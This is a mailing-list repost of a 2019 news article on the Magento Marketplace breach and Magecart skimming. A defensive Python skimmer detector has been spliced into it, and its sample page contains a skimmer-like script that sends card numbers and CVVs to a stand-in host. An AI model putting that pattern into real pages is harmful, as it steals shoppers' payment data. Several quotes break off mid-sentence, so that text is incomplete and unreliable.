[BreachExchange] Magento Marketplace Suffers Data Breach, Adobe Warns

Destry Winant destry at riskbasedsecurity.com
Tue Dec 3 10:06:59 EST 2019


The Magento Marketplace application store suffered a breach that
exposed user data, software giant Adobe Systems warns.

Magento is one of the world's most widely used e-commerce platforms.

Adobe says it identified a vulnerability in the e-commerce marketplace
on Nov. 21, which was exploited by an "unauthorized third party" to
access "account information related to Magento Marketplace account
holders," according to an email advisory. The advisory was posted by
some users on Twitter.

The exposed data included names, email addresses, usernames - aka
MageIDs - as well as billing and shipping addresses, phone numbers and
"limited commercial information (percentages for payments to

The advisory adds: "This issue did not affect the operation of any
Magento core products or services," and Adobe said the exploited flaw
was "quickly fixed."

Adobe did not say how many users' data was exposed or how long the
data breach lasted. Affected users are being contacted by email.

Adobe did not immediately respond to further questions from
Information Security Media Group submitted late on Thursday.

Web Skimming

Magento, which was acquired by Adobe last year for $1.7 billion, is
one of the most popular e-commerce platforms. A 2017 year in review
published by Magento said it was being used by 250,000 merchants.

As with any software designed to handle financial transactions,
Magento has been persistently targeted by cybercriminals, including by
Magecart, which is an umbrella term used to describe groups of
attackers that regularly tamper with systems to steal payment card
data (see Magecart Group Continues Targeting E-Commerce Sites).

Magecart attacks against Magento continue to escalate. In May, the
security vendor RiskIQ wrote that it had detected "some of the most
significant Magecart attacks ever carried out."

Yonathan Klijnsma, a threat researcher with RiskIQ, writes that
e-commerce shops running Magento are the prime target for groups
running web skimming - aka digital skimming - attacks. Such attacks
typically involve exploiting vulnerabilities or outdated software to
install malicious code that collects payment card details and sends
them to a remote server, for later retrieval by attackers.
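As an added example, not code from the article, RiskIQ or Magento, the Python below implements the check a merchant can run against a checkout page to spot the pattern just described: a script that reads payment fields and sends them to a host the store does not own. The sample page, the host names (shop.example, stats-cdn.example, third-party-widget.example) and the skimmer-like snippet are constructed for the example; the regexes are heuristics that only catch unobfuscated code.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed checkout page for the example: two external scripts, a benign
# inline validator and a skimmer-like inline script. None of it is code taken
# from a real compromised store.
SAMPLE_HTML = """<html><body>
<form id="checkout">
  <input name="cc_number"> <input name="cc_cvv">
</form>
<script src="https://shop.example/static/checkout.js"></script>
<script>
  // benign: validation that never leaves the page
  document.getElementById('checkout').addEventListener('submit', function (e) {
    if (!document.querySelector('[name=cc_number]').value) e.preventDefault();
  });
</script>
<script>
  // skimmer-like: read the card fields and beacon them to a third-party host
  document.getElementById('checkout').addEventListener('submit', function () {
    var d = {n: document.querySelector('[name=cc_number]').value,
             c: document.querySelector('[name=cc_cvv]').value};
    new Image().src = 'https://stats-cdn.example/g.php?d=' + btoa(JSON.stringify(d));
  });
</script>
<script src="https://third-party-widget.example/loader.js"></script>
</body></html>"""

# Heuristic indicators. Real skimmers are usually obfuscated, so these only
# catch the naive case; treat hits as leads for review, not as verdicts.
CARD_FIELD_RE = re.compile(r"cc_|card|cvv|cvc|expir", re.I)
EXFIL_RE = re.compile(r"fetch\s*\(|XMLHttpRequest|sendBeacon|new\s+Image\s*\(|\.src\s*=")
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []      # src of each <script src=...>
        self.inline = []        # body of each <script>...</script>
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def offsite_hosts(text, allowed_hosts):
    """Hostnames of URLs in text that are not in the allow-list."""
    hosts = {urlparse(u).hostname for u in URL_RE.findall(text)}
    return sorted(h for h in hosts if h and h not in allowed_hosts)


def find_skimmer_indicators(html, allowed_hosts):
    """Return (kind, host) findings for scripts that look like skimmers.

    'external_script_offsite': a <script src> loaded from a host outside the
    allow-list (a supply-chain risk even when it is not a skimmer).
    'inline_exfil': an inline script that touches payment fields, contains a
    network call, and names an off-site host to send to.
    """
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = urlparse(src).hostname
        if host and host not in allowed_hosts:
            findings.append(("external_script_offsite", host))
    for body in parser.inline:
        offsite = offsite_hosts(body, allowed_hosts)
        if CARD_FIELD_RE.search(body) and EXFIL_RE.search(body) and offsite:
            findings.append(("inline_exfil", offsite[0]))
    return findings


if __name__ == "__main__":
    for kind, host in find_skimmer_indicators(SAMPLE_HTML, {"shop.example"}):
        print(f"{kind}: {host}")
```

Run it against a saved copy of the live checkout page, not the file on disk: skimmers injected through a compromised admin panel or database live only in the rendered HTML, and the allow-list should be the short list of hosts the store deliberately loads scripts from.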

Attackers quickly abuse new flaws that come to light in Magento.
Earlier this month, for example, Magento warned of a serious remote
code execution vulnerability, designated CVE-2019-8144.

"Merchants running Magento Commerce 2.3.x should install the latest
security update to help protect their stores from potential malicious
attacks that could exploit a vulnerability in preview methods,"
Magento's security advisory reads. "This vulnerability could enable an
unauthenticated user to insert a malicious payload into a merchant's
site and execute it, which is why we recommend installing this

The vulnerability was serious enough that Magento added additional
defenses to try to prevent attackers from exploiting the flaw. Those
changes meant that administrators couldn't view previews for products,
or for blocks or dynamic blocks, which allow developers to show
certain content to specific audience segments.

E-Commerce Attacks Continue

Klijnsma says that the volume of attacks being directed at Magento or
other major e-commerce platforms - including Shopify, OpenCart and
OSCommerce - is unlikely to decline anytime soon.

"Businesses need a continued focus on visibility into their
internet-facing attack surfaces, as well as scrutiny of the
third-party services that constitute their web applications," he
writes. "Magecart's recent ravages have shown that a lot of the
investment in securing corporate infrastructure hasn't worked.
Companies will continue to be overwhelmed by the scale and tenacity of
these kinds of groups, especially as attacks launch from outside the
firewall and the data theft occurs in the user's browser."

Warning: Phishing Attacks

Unfortunately, the type of data leaked in the breach that Adobe
detected on Nov. 21 could be put to use by attackers, for example, to
launch repeat phishing attacks against Magento users.

Earlier this year, the Magento security team issued a warning about
active phishing campaigns.

"We are aware of reports that phishing attempts are impersonating
Magento and are being used for targeted attacks," the advisory says.
"This misleading phishing email encourages users to click on a link
that indicates all users are required to register for an alert

The alert advised users to check email headers to ensure an email
actually came from Magento, to be on the lookout for grammatical
errors, and to analyze any URLs included in the content to spot
potential oddities. The security team also warned users never to open
zip files or other attachments included with purported emails from